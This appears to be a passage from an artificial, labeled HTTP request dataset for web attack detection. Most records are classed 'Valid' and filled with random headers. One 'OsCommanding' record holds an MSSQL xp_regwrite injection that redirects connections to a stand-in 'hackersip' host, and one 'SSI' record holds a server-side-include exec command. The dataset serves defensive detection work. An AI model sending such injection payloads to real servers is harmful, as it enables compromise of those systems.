Accept-Charset: *
Accept-Encoding: *
Accept-Language: heai4age-ebaCTi, ireyAoos-ReseAor;q=0.2
Cache-Control: max-stale
Client-ip: 43.89.221.156
Cookie: tem=978;isO=7-BW;adttess=rXQhBfEGyU;kce2tnT=slogsform;aeteeerssEe5=hiumocmtsc
Cookie2: $Version="142"
Date: Sat, 13 Mar 04 22:31:53 CET
ETag: W/"4XuG9KgXg@dZ5NSgr"
Expect: 100-continue
From: tduar@4rlra.gov
If-Modified-Since: Sat, 28 May 05 24:27:34 UTC
If-Unmodified-Since: Tue, 04 Jan 05 10:02:01 GMT
If-Match: *
If-None-Match: "i_n1dzhyKWOLizG"
If-Range: *
Max-Forwards: 0
MIME-Version: 5.5
Pragma: as=itdp5r
Proxy-Authorization: Basic b3NtdDA6YW5mMmFvYXQ=
Authorization: ejouB wzccOa=edsedbd
Range: 754-536
Referer: /mNWg/uiLaiCt/teeujaNh/oals.dll
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.8 (Machintosh; U; Mac OS X 2.9; 0b-c9; rv:0.0.8) Gecko/26303338
UA-CPU: StrongARM
UA-Disp: 243,084,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 965x809
Via: nsi/1.8 www.9om4e.js, FTP/5.9 19.146.105.217, FTP/1.6 www.hdqteve6.htm
Transfer-Encoding: compress
Upgrade: taw/5.7, sl9s/4.0, eealhu/9.7
Warning: 930 www.gann.tiff:7436 "einsIhshengyqheerxme" "Fri, 13 May 05 19:34:11 GMT"
X-Forwarded-For: 112.8.23.251
X-Serial-Number: 7465297368
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28388
Start - Id: 5066
class: Valid
POST /vnenmn.jsp? HTTP/1.1
Content-Length: 193
Content-Language: oae,wrA,mmlcZr
Content-Encoding: identity
Content-Location: /eclNij.swf
Content-MD5: ZW1hcmVEazhyaGQ3VGxldA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 May 08 24:52:37 GMT
Last-Modified: Fri, 26 Dec 08 11:43:43 CET
Host: 121.92.47.167
Connection: eni79y
Accept: */*
Accept-Charset: windows-1252, x-mac-chinesetrad, gb2312
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 109.59.176.137
Cookie: tacwheti2whcp=5;6ThhA=jiQSFnPHHq;WpbinetCeodw=ts5ra9tnna0yE;lenpp7hoioie=71;8.XcSq3GL2H=4;e5ono=7292
Cookie2: $Version="9"
Date: Wed, 18 Feb 09 12:55:06 CET
ETag: "ysQeb7HLdpYvo.M2T"
Expect: 100-continue
From: adhno@nitwillnza.be
If-Modified-Since: Tue, 05 Oct 04 05:19:37 CET
If-Unmodified-Since: Thu, 20 Sep 07 16:16:31 GMT
If-Match: "Tiqju.UdXgXHv8bdwVbg"
If-None-Match: "Z3zpJizC0k65McRw"
If-Range: *
Max-Forwards: 0
MIME-Version: 8.8
Pragma: nda=iP4o8twc
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: NTLM b2lpZGllZGhjaGlla2xtMW9hcmNua3llV2xyMmJkYWl0NWl5aUJBaVNoM2hub3Mz
Range: -75679,92-5
Referer: /ta2n/teryLwn/iduAtg.tar
TE: trailers,trailers
Trailer: Host
User-Agent: atefae1gwf/3.3.3.3.0
UA-CPU: PowerPC
UA-Disp: 925,165,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7508x091
Via: 4.9 www.rehrpc.jpeg, FTP/8.7 206.120.54.38, HTTP/6.2 106.101.120.60
Transfer-Encoding: deflate
Upgrade: hattj/5.9
Warning: 467 150.166.100.47 "uemut595tnsdte" "Mon, 06 Dec 04 06:40:13 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 768218785
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

iexdhcuacp=hnqt=e8tuwxec$oposition u&Odonmkejt8Ej=eid0&na99d=hlXrajoW&8loetApdai2ugR3=ruecgosierCe&srnuhtui=wrsssnmochaVna?1ec&2hehAept=htt&m6eacoihnfe=res&nullxmld@bIN1=yotuppwednzrErmnt

End - Id: 5066
Start - Id: 26376
class: Valid
GET /f2FAjlb/wRoPA2s.rVIHWTeyKN/fntz4gi2hae4tmrfie/vbscripts/n5HjCW/sCi4qDEbuTradiae/aXSoIK.htm?8St=88071&nro=4&Aeg=4234338&lyf=82&WRastn=at+wp-&gsiset4Jns6etet=4&sBoiA03cs9OVtha=rcJZX2Ze&9NR=2&enH=315262639&ncHk5K-jmetak=3&ietwhaenyzsnCdl=sC%407%40xRhf&0L_@jEf=ah%3D&yrin=3&tydetxtgyso=onm&coldaiitohc=089106423 HTTP/1.0
Host: www.ehtB4igVo.it
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: compress, identity;q=0.2
Accept-Language: TsOch-Nny;q=0.1, a-i, nnhv-sd2oeaes, eRof4hhe-opoen
Cache-Control: no-cache
Client-ip: 190.192.128.18
Cookie: sooensWyha=04159240;qy-Xmc=x0fv5;BA8ed=or;sasadZhXo=6;snttA7iores=eo
Cookie2: $Version="721"
Date: Mon, 05 Nov 07 16:41:12 CET
ETag: "OhD3JBX6Up@Dc3zRCDvI"
Expect: 100-continue
From: o9rl@rvzt.com
If-Modified-Since: Fri, 23 Nov 07 23:56:52 UTC
If-Unmodified-Since: Sat, 05 Aug 06 21:15:15 GMT
If-Match: "u93QcG_7hpY@RynFe"
If-None-Match: *
If-Range: Sun, 11 May 08 20:53:11 CET
Max-Forwards: 6184
MIME-Version: 8.2
Pragma: yosh=cOaJ4
Proxy-Authorization: NTLM bmRsZTZVbWFhYXltcHQzZjJlaWI4c2l5ZDBlaGFFc3RldXNiZGVybmRpbWRlYWU=
Authorization: Digest uri=http://www.ttps3klt.ch/I0tip/cae6Ee/ohqa/ehi6te/TrastqrD.css
Range: -28
Referer: /dg9ee/hqs3most/a3cIn.cfm
TE: chunked;q=0.5,trailers,trailers
Trailer: From
User-Agent: eeol (yUyyqqb; 8goRTvui)
UA-CPU: PowerPC
UA-Disp: 146,5965,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 778x382
Via: 3.2 www.eagoa.html, 3.7 www.pocaj.gif
Transfer-Encoding: ei3dl; ewmImao=Dids
Upgrade: Yoanr/1.5, vNn/4.7, 7loa/0.1, nab9I/9.9, ale/2.7
Warning: 020 www.ayrf.jpg "Daycrem9Hi1ysiiden" 
X-Forwarded-For: 102.222.80.26
X-Serial-Number: 683890347
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26376
Start - Id: 6161
class: Valid
PUT /lccF5rrEpo3ReuneqEnr/bOXxFCY3MmOuQgeLwA/eccteeeblefet/9a6ce9uNgo/crveidets/q.UunioninFqa/nftpiweinputh8s1AQW/tthwsp7snhn1nuRpr/9UCm/ebpLVr-lXv.html? HTTP/1.0
Content-Length: 161
Content-Language: t2
Content-Encoding: compress
Content-Location: /tdlseShg/napl/remd.pdf
Content-MD5: N3kyb29mbml0cnVkcHBlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Jun 06 09:27:38 GMT
Last-Modified: Tue, 15 May 07 19:02:10 UTC
Host: www.oz2etrt.com
Connection: imfim
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity, deflate, identity
Accept-Language: nwrksn-0djeu
Cache-Control: min-fresh=6
Client-ip: 46.232.254.101
Cookie: srdoNbmena=cWzyzutK;om7=xU_P;rwh1roNodssrc=255017
Cookie2: $Version="1"
Date: Tue, 10 Jan 06 22:35:16 CET
ETag: W/"5@jVQ3pEPs2S2jRfq5"
Expect: ntotfl=tARTotmv
From: naetdy@ntn7esecez.uk
If-Modified-Since: Mon, 02 Mar 09 09:43:02 UTC
If-Unmodified-Since: Tue, 25 Mar 08 03:09:01 CET
If-Match: *
If-None-Match: "x4WVGBV75HqYCqKbYAOU"
If-Range: *
Max-Forwards: 4215
MIME-Version: 5.7
Pragma: hcaW=pWE
Proxy-Authorization: Basic MUV6bGVxOlZhZmF5c3Ji
Authorization: NTLM aUVhbWh1dEx3dG1zNXBzZWNhM2xvZXRtYmFvcnptZGlOdHN0
Range: 611533-,1458-075
Referer: http://www.tngdnoxa.de/aothjd/2ctpc/7llaypa/abnrue2l.rar
TE: chunked;q=0.9,deflate;q=0.9
Trailer: Accept
User-Agent: miISBhD1 http://www.olYf.gov
UA-CPU: StrongARM
UA-Disp: 105,6960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3345x4822
Via: HTTP/4.5 38.119.127.248
Transfer-Encoding: aea4st
Upgrade: Eer/4.2, FhrnoE/6.3, auine/9.9, w7Ee5h/8.1
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 175.130.165.6
X-Serial-Number: 9298253900687
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

h.Ychildg8aKP5=jgfwne)nhe\t&rnoa0ht=kc.Ib4.-3iMH&esedatehe=seixlformpuOnt&gx@rcp6=p&k1lBmgIGjOI=&mi&tntrh=rusrLerssock_streamweon&9gnelqet1oNwni=9833556381

End - Id: 6161
Start - Id: 32297
class: Valid
GET /poHpTAuhwGbZYJ/eFpvfy53-nGNbDdCpE/oTPmh22SbuoW7Z09Pw5/iI4hFwx/yoAbTXasU_N/HMOno4.htm?m8Eotyp=nodeetaHOIB&NRvfoytE=97929&eeeustc36i=hia%29nn1ewaopenyofbjGi%24object HTTP/1.1
Host: 53.122.61.92
Connection: close
Accept: */*;q=0.5
Accept-Charset: euc-tw, x-mac-ce
Accept-Encoding: 
Accept-Language: rA-wr, etiueccy-en;q=0.9, oy-i;q=0.8, dsnfarn-ia0aGau
Cache-Control: max-stale=41
Client-ip: 182.232.178.65
Cookie: opt6_3sfD=]nF;nsl=dia86mformret;esagcr=84811;sfAye=1;nd=7729;Hdwwinntc=poymEfgIrba
Cookie2: $Version="501"
Date: Sun, 05 Sep 04 15:10:38 GMT
ETag: "5PC@hhpJ@Jsu8Oiv"
Expect: 3zih
From: dyhd@dppe.gov
If-Modified-Since: Sun, 15 May 05 07:37:18 CET
If-Unmodified-Since: Sun, 22 Feb 09 10:14:34 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Apr 05 05:10:13 UTC
Max-Forwards: 206
MIME-Version: 9.5
Pragma: mp0i='hcr2'
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: NTLM b2FpZThlZXhkaHgzYXdhdWlyaGVuamh5ZG9JZlNrc3lsdTBBZG5IaWVBbg==
Range: -81,-436508
Referer: /9liCc.shtml
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/9.5 (Windows; U; Win98 1.0; tt-ey; rv:3.7.6) Gecko/41278990
UA-CPU: x86
UA-Disp: 096,809,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3225x292
Via: HTTP/8.3 www.Hs3cuejy.tiff
Transfer-Encoding: gzip
Upgrade: isLo/1.1, ii6oo9/3.4, yei/5.6
Warning: 188 128.175.35.78:84438 "S5oiobSrnbBr6fnyRoo" "Thu, 12 Oct 06 18:58:00 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 7859774427
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32297
Start - Id: 2078
class: Valid
GET /9iyl/hNJSX0jE24/dNML/n9J3ap47IQPEkH/eokne/Rpfli/suLgFFF96XQCFO2AaJ/eniwmmvii.aspx?ldeepeUrdr=em4.s&itgxngaiif=54865&iotiaebgnEsxpth=10853079&ccIn6tshoe7Osd=ePA%7ElUiesce%3Fgs&umczhpllit7ef=51391 HTTP/1.0
Host: 28.4.233.101:80
Connection: close
Accept: video/mpeg, video/quicktime;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oicon3Th-e
Cache-Control: min-fresh=7
Client-ip: 228.194.108.148
Cookie: no=5w;20qa2EpsKiA=$r$nu?remR5y;mbtmwhtha6=lTaelwTltaby;b742hepsieG5le=1SX.rd
Cookie2: $Version="71"
Date: Sat, 27 Jan 07 09:49:17 GMT
ETag: "m@T0M8mG.9v9QkY_rX"
Expect: xglpw
From: Iosu@aert5hd.ch
If-Modified-Since: Tue, 30 Dec 08 19:01:07 CET
If-Unmodified-Since: Fri, 24 Oct 08 05:30:18 UTC
If-Match: *
If-None-Match: "QromzpSLi3iZIOJ0yWDX"
If-Range: Sat, 15 Nov 08 06:24:26 GMT
Max-Forwards: 8
MIME-Version: 8.8
Pragma: snu=psoioNe
Proxy-Authorization: Basic bDU0RTVvcjphZWEwdA==
Authorization: NTLM dWdFdHRoYWwxb2g1aWhzZnJjOGF0U28yNDUyZXM2aTZiNzJlMQ==
Range: 703917-,4853-42336,855-
Referer: http://n9moEUeh.gov/leal/stdort/aolnK.gz
TE: trailers,gzip
Trailer: TE
User-Agent: Mozilla/8.7 (compatible; Konqueror/9.4; Mac OS X; HMhlshp; eorf)
UA-CPU: StrongARM
UA-Disp: 4115,383,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9053x775
Via: edas/2.6 225.227.6.38, 7.4 170.98.38.90
Transfer-Encoding: tlvs; uwvla=rSdhfsee
Upgrade: hli/9.0
Warning: 818 177.52.40.0:7 "eese0qtmam" "Thu, 12 Nov 09 18:55:16 GMT"
X-Forwarded-For: 108.113.52.240
X-Serial-Number: 0933416903549
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2078
Start - Id: 13179
class: Valid
GET /ceCitano2y/de/s._jScqvwY_/rTvOGVFcqO167wAWY5/r9TG7FkFsLMScaR.jsp? HTTP/1.1
Host: www.tt8tryteRr.gov
Connection: itoi
Accept: text/*
Accept-Charset: iso-8859-9, ks_c_5601-1987;q=0.1
Accept-Encoding: deflate;q=0.8, identity;q=0.8
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 128.244.126.96
Cookie: nAtEraseb=8te e;aos6leed=403997;uRCexecE=[lbsdoo3og<q;vei4oosuo=a-Zcyj6GAr;astotnoiucxbfCe=h;UtlhttpZLGjtCZ=rnSbo7iqu
Cookie2: $Version="095"
Date: Mon, 22 Nov 04 03:56:13 UTC
ETag: "n9tR8-lMN_crbqnE"
Expect: rf7Aybh
From: eswp2a@SmynxY.com
If-Modified-Since: Tue, 26 Apr 05 02:09:17 GMT
If-Unmodified-Since: Fri, 14 Mar 08 24:09:58 GMT
If-Match: "ypyIenCABvkEcTxxSQl"
If-None-Match: "ASnTNsDw38eZAB4_F2"
If-Range: Tue, 20 Mar 07 13:49:12 GMT
Max-Forwards: 548
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic Zm5vdWE6b3R4dHM=
Authorization: NTLM a2Q0c3I0ZVVvZW5tZ0VvcWFyaWluc2RzdW8xdHdlbmg2
Range: 45-17033,2056-83
Referer: /iscm.asp
TE: chunked
Trailer: From
User-Agent: eeres (rBCTwjIy; eEU6YXT8x; dPSF2n5)
UA-CPU: Sparc
UA-Disp: 185,098,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6456x555
Via: 2.9 www.rwnbteo.css, 0.8 www.awgeRyS.jpg, 9.4 98.14.251.74
Transfer-Encoding: compress
Upgrade: skn/0.2, ttri5f/7.5, Xl2hi/6.4, lre/8.6
Warning: 183 2.31.82.140 "EmePDtapnntrh" "Wed, 06 Jun 07 03:28:08 UTC"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 82100256836
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13179
Start - Id: 19591
class: Valid
GET /oeeq4e7e1nat/3l2-lhHiO4KTA.php?2NZFmeta3qJexec@=jt7a&3uTolsktht=sJ1NO&odaee7hueeenE=5&Thigh=472118&oynpmpmltpay=274993&stdinFPwpmt6cOVS=o9nGs5kn&hipealhli5=7&8qUY-8qTgS=h%3FmtTo%28eev5&unw0w=eTegsqzqha&dgtl1=UfeEliketoue8&dxnnlkR=wQyWKzQ&jlLUrm3jlibY=mCY5Odf_x&7hntstidi=9317&kJRhavingnc9E0WMMecho=599 HTTP/1.0
Host: 194.144.197.65:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1250;q=0.6, koi8;q=0.1
Accept-Encoding: compress;q=0.0, gzip;q=0.3, gzip, compress;q=0.6
Accept-Language: Taztst0-stmid;q=0.5
Cache-Control: min-fresh=3
Client-ip: 62.46.154.100
Cookie: ehslanepFteDrc=2397337377;0ch=safobnrkEsiwa5Ra3t;o7tO0tas5ehw=0rru6efhttpw8I8n ;oaot2t=noo
Cookie2: $Version="175"
Date: Sun, 24 Jun 07 21:30:45 UTC
ETag: "vfEVZCt5Z5rkHvk@rL5s"
Expect: Dgroeito
From: hcAa@ot1oomNS.fr
If-Modified-Since: Tue, 21 Jul 09 22:46:02 UTC
If-Unmodified-Since: Sat, 29 May 04 17:15:43 GMT
If-Match: *
If-None-Match: "JMAC4btna_iTi_-aata"
If-Range: "oN7qm0OeiS4-EKei"
Max-Forwards: 239
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest response="26f0Ddd9c3EF6aBbfeE8e5AF980aDe9d"
Authorization: Basic YTNlaWE6OWN4eW8=
Range: -7,50399-8
Referer: http://dn3bu.fr/nkoPTee.jsp
TE: deflate,trailers,trailers
Trailer: Upgrade
User-Agent: ehdR72ye/2.5.0
UA-CPU: PowerPC
UA-Disp: 187,0883,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4605x2042
Via: 7.8 www.tjutjat.css, HTTP/0.5 121.3.205.22, vedmhc/1.4 www.RhrLouk5.png
Transfer-Encoding: identity
Upgrade: arcod/1.6, ezoee/4.7, bon/3.5
Warning: 605 www.dnne.shtml "oI3esi8tekNt" 
X-Forwarded-For: 240.111.161.144
X-Serial-Number: 1701611
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19591
Start - Id: 19199
class: Valid
GET /bocrhoPwtfwsn7dHk/ojRSf_2lOR@l1dl/odinvn2atUm/v@149SbRbF4/8O9McaX/HKPvfdpopenwgetq814qP/aarlar5e/elWRiga_Rnp.4G/SkgryAsaegeoe4aaEe/rsmegegrn/astdmo0e.jpeg?Pwp-PPuO@htaccesZCK5=ets HTTP/1.1
Host: 62.40.192.50:80
Connection: lutKsce
Accept: text/*;q=0.3, text/plain
Accept-Charset: iso-8859-1, euc-kr;q=0.5, cp-932;q=0.3, windows-1255;q=0.8, x-mac-arabic;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: ar5oRo0=ltteaas
Client-ip: 194.46.12.62
Cookie: 5rc=x;ilws=0teg;azi=b9zopGMeYuI;takhOethkofwebI=7972330;oewwaRei=061;Pu=lseinT:mthtaccesy 
Cookie2: $Version="7"
Date: Sat, 18 Feb 06 17:25:11 CET
ETag: W/"nqeS2aEaHXxMLY2Se"
Expect: 100-continue
From: nendeo@nesuf.ch
If-Modified-Since: Fri, 30 Oct 09 05:35:39 GMT
If-Unmodified-Since: Fri, 21 May 04 13:55:02 CET
If-Match: *
If-None-Match: "2moAAN-giP@lggKgkZM"
If-Range: "f4q2hnLf_n.XVjWk64o5"
Max-Forwards: 144
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM QW9mM3l1YXZ0aXI3MHNsd3N1cmVkbnVTbnJoRGV3bHlkdWVlbmw=
Authorization: NTLM d2FtMTZoZW5hcXBhQ2poZGFkb2t1clVlZWVjZXlyaXBpdDg=
Range: 967604-010774,-548402
Referer: /hxSo.bin
TE: trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/2.7 (X11; U; Linux i386 1.6; qo-9t; rv:4.2.4) Gecko/69046860
UA-CPU: 68000
UA-Disp: 246,582,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: 6.1 118.102.198.56
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
Warning: 539 221.202.18.198 "tncz1zcarcoriB" 
X-Forwarded-For: 241.243.123.217
X-Serial-Number: 1861049652
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19199
Start - Id: 16066
class: Valid
GET /ieoadmhenOsfies/hndo6Elokrokensuo57G/nidinqnirlbToc2eih/3fpWnnii10ciytaabZu/uN8rWk2Hit8C_stJP/ahj5vEMijmTS/BUoFmwAklibS8KT3F/0Et-dInR_YO/9dhbt/r7_yAw@gs.B3YH0JW/aMIhviAJ8-3W_dBxlSd/oeesBNs98eqare.shtml?nph-ltxOv=oesI2&pucusttadhM8a=9526166&eeritororrCrct=sBrAe2-&AsnsnmLoo1ei=cmgaphp%5CahencV&Tahgereoa=mctLJot5&t7fmtcaih=nmlBO&fhkytpalydHLw=nd+gs6thsystemi%2BdoaghhV&3x_aSYBd%u3L=8 HTTP/1.0
Host: www.edosesgmnt.st
Connection: oiKj3r
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, identity, gzip;q=0.4, gzip, identity;q=0.7
Accept-Language: pi-nhSwh, neoae4j-itx, Nu32rl-ceeCsbo
Cache-Control: no-store
Client-ip: 139.53.120.102
Cookie: iqn8rhdnOa=>nsbodyoshutdownhi arp dtnhv;tEPuo=1tlo1formemesi6;XMTp@NGwp-z=o4o;eas=3ahtg;pkBhnc@=xtermai;siB1aoteg=5
Cookie2: $Version="7"
Date: Wed, 12 May 04 01:00:03 CET
ETag: "rNPQqSBe3adujrY"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Tue, 21 Feb 06 24:49:06 GMT
If-Unmodified-Since: Sat, 13 Sep 08 06:02:17 UTC
If-Match: *
If-None-Match: "bj9AHG6gYP3Whdu42PKi"
If-Range: *
Max-Forwards: 781
MIME-Version: 5.7
Pragma: oriTnh=O
Proxy-Authorization: Digest opaque="neh7g"
Authorization: Digest nonce
Range: -84,27-038,192411-63468
Referer: /Bdlqa/esOxs.tiff
TE: trailers,chunked;q=0.7,deflate
Trailer: Via
User-Agent: apsjhnsn
UA-CPU: MIPS
UA-Disp: 489,939,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 973x791
Via: HTTP/4.0 www.iii0iadr.html, 7.0 www.vhfa.html
Transfer-Encoding: Rlmv; sE0igil=el3csi
Upgrade: ryRqrn/6.0, etn1na/2.3, lseeoe/0.1, tds/4.7
Warning: 143 75.253.104.203 "yotde2operezehhhize" 
X-Forwarded-For: 10.132.59.91
X-Serial-Number: 6495346475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16066
Start - Id: 36404
class: OsCommanding
GET /tWjJvcdJ3ulUQ/hAareggk9iAh.bin?2iuiem8elfiets=o8%2B7g%3Bgxr3&amsnenodkS82eN=3799&xmhr=3&egdi=6220062&fromN5formLe=onode&oh=f07dotcg&aieao6=b&io873eOnso2ghys=n%40mM6HIQ&3xterm53L=exec++xp_regwrite+++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27lao3raEol%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&obntcirae4shiu=13771610&sTl=134&J9Ai_MVbetweenRIS=bISF8wix-S HTTP/1.0
Host: www.onsmwM.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: vIf3oRat-qrm;q=0.4, Harn-reLbSFuo, 7fe-Anotbmp, 01e-telrh, euthooh-wsLeCbeh;q=0.7
Cache-Control: max-age=7788
Client-ip: 223.164.71.64
Cookie: em=oe8fo3bioednttie;Eiobliuta=iePtqi;usenrxr=45353475
Date: Sun, 01 May 05 13:38:24 UTC
ETag: "hOr.gXCisBKC7v6cJQ"
If-Modified-Since: Wed, 15 Nov 06 18:12:26 GMT
If-Match: "mraU4plO@YrjbvId85k1"
If-None-Match: *
If-Range: Sun, 13 May 07 24:50:40 GMT
Referer: /isyt/sldo9a/BxHdeslg.txt
TE: trailers,deflate
User-Agent: yhX8ch (aSfyWYz)
Via: LYb4ae/0.7 73.2.170.101, HTTP/4.2 49.95.165.25
X-Serial-Number: 3132284615
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36404
Start - Id: 40018
class: SSI
GET /echo7/ke8EpFrcpNjBG/eh9rEsnd5AP/nhi/bF.html?i5emmelfhbeaqkl=irXmw&sEaeei=a&ajGtL9NLB.=owget1%2Fuanentreblikehdniphph&tsat=ahthm6ynlcnt&k4ohhtgiooecxbe=ooTtiopeni&8nEeplaRLrtc=ds3n&rci0yraesesgvfi=iozDG&lreiynrtto=dbOcyr69&imt0fahn=etsreeE1a&tgx8gta3=r9Im.Y4hF&oh1vhcesitEec=699496372&iw8sinma9=503789&rtb3l5ist=%3C%21--+%23exec++cmd%3D%22%2Fbin%2Fls++-l+++%2Fhome%2FRlontezdrh%2Fhrjgra%22+++--%3E&eohooaxo=4880720113&at-d3Tx=4 HTTP/1.0
Host: www.iRtt.ch
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.2, iso-8859-4, x-mac-turkish;q=0.3, koi8
Accept-Encoding: deflate, identity
Accept-Language: de-ath, ggeCvc-vsw;q=0.1
Cache-Control: min-fresh=69
Client-ip: 186.147.250.219
Cookie: fonM=dbeun;7oefrniellldtmt= e;pi=u45F1BL;gPtfupdatediv-hXRMI=~0ex);euun3ph=7379231
Cookie2: $Version="063"
Date: Wed, 04 Jan 06 09:42:16 CET
ETag: W/"M_ybmZVvZ2LN3u7elOw"
Expect: 100-continue
From: l1ahde@nablau.fr
If-Modified-Since: Wed, 25 Aug 04 17:54:14 GMT
If-Unmodified-Since: Sun, 14 Sep 08 15:30:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.8
Pragma: t=xsA3namm
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: rnefn thutlu0=teulA
Range: -382094,59133-7365
Referer: http://jenrmur.it/twatih8/ctEksmi.jsp
TE: trailers,deflate;q=0.0
Trailer: Cache-Control
User-Agent: osEahtlr (wtZFVA2; jMVw11; e2-N1Uh-2U; qg2Tp8; bBmvI3H9x2)
UA-CPU: Sparc
UA-Disp: 270,463,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 4.6 207.75.71.140
Transfer-Encoding: gzip
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40018
Start - Id: 11298
class: Valid
GET /uvLTuVxU2Lx3If7rrT/cachlzsrps.html? HTTP/1.0
Host: 20.65.71.24
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312;q=0.0, x-mac-korean;q=0.7, windows-1251;q=0.2, koi8, windows-1252;q=0.3
Accept-Encoding: *
Accept-Language: toYo-l;q=0.3
Cache-Control: no-cache
Client-ip: 110.33.12.89
Cookie: ecollesaiI=032703654
Cookie2: $Version="547"
Date: Wed, 12 May 04 09:50:35 CET
ETag: "nlsHB9XAlz@XOBDSMg"
Expect: gCSEste
From: ttdeuerp@Beemcrefe.st
If-Modified-Since: Fri, 12 Feb 10 24:24:02 CET
If-Unmodified-Since: Mon, 17 Sep 07 12:18:25 CET
If-Match: "2JYBuSGbQv.34P6"
If-None-Match: "CjI3W4.UhtZLbnXOfL"
If-Range: *
Max-Forwards: 69
MIME-Version: 5.7
Pragma: egoenljo='aeF'
Proxy-Authorization: Basic MGt5bGk6d2h0c0N1aWI=
Authorization: NTLM dW9OYWdubW9hMHFFZWpyTW5vQXhuY2lybkgxMGhFMmZqSTlkemgyclV4aGVuYQ==
Range: 51-551841
Referer: http://www.Anuc33ir.fr/ghrss/ehd9/ywsio.asp
TE: gzip;q=0.5,chunked
Trailer: Date
User-Agent: Mozilla/1.7 (X11; U; Linux i586 0.1; ae-3t; rv:3.2.2) Gecko/62846628
UA-CPU: StrongARM
UA-Disp: 2659,0505,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2840x080
Via: FTP/4.3 www.mlIh.jpg:7488
Transfer-Encoding: compress
Upgrade: Iinf/7.1, oavrcs/0.2, aMti/2.8, uud/0.6, sprmls/3.8
Warning: 409 222.12.69.102:53 "cN5tt" "Sat, 16 Feb 08 12:02:42 CET"
X-Forwarded-For: 203.140.233.72
X-Serial-Number: 7492268797432274
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11298
Start - Id: 1784
class: Valid
GET /et/siDI1DyL/47/73po1inputAmI/o8iB9iahHnass6/opty7@WH/ohtnU@X_z-kr/mF/mP/SclacoArrh3dzlwee6ro/eIistytea7yio/updatei.a.tiff?TzbgsoundB=+n&rnDereyhui=8828680740&saP=ece+s&seToahs=n+%28iuaiyflnand6&itsef=orhmmE4liseer&nnanz=556099&oeiicitadi=3 HTTP/1.0
Host: 238.110.57.97
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: macintosh, iso-8859-9, x-mac-ce, iso-10646-ucs-2;q=0.7, iso-8859-4
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 159.231.87.7
Cookie: ohf5=E7ottyaCs;ZoQ_2_TVh0h=sbh;irn5njiuoz3=sfSCov1
